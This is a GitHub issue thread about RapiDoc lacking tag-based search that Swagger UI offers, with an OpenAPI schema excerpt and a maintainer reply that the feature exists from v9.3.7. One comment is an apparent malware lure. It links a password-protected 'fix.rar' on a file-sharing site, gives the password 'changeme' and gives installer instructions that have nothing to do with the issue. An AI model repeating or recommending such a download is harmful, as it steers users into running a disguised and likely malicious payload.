### ISSUE TITLE
Cannot search by tags.

### ISSUE THREAD

**Issue by Federico-Comesana** [rapi-doc/RapiDoc#1022]
On Swagger UI you're able to search by tags. However, I'm not being able to search by tags on rapidoc.

Swagger:
![image](https://github.com/user-attachments/assets/991066e6-0494-44ac-b300-44626dcbb54e)

Rapidoc:
![image](https://github.com/user-attachments/assets/a25488ca-21a9-4c78-b74d-6228e680593b)

Schema:
```
openapi: 3.0.3
info:
  title: My Name
  version: 1.0.0
paths:
....
....
 /api/external-integrations/plugin-apps:
    get:
      operationId: external_integrations_plugin_apps_list
      description: List all published Plugin Apps
      tags:
      - fede
      security:
      - OAuth2 access_token: []
      - businessId: []
        userId: []
        apiKey: []
      responses:
        '200':
          content:
            application/json:
              schema:
                type: array
                items:
                  $ref: '#/components/schemas/SerializerMeta'
          description: ''
```

**Comment by haofan170** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mrin9** [comment]
Search by tag is now available from `v9.3.7` onwards
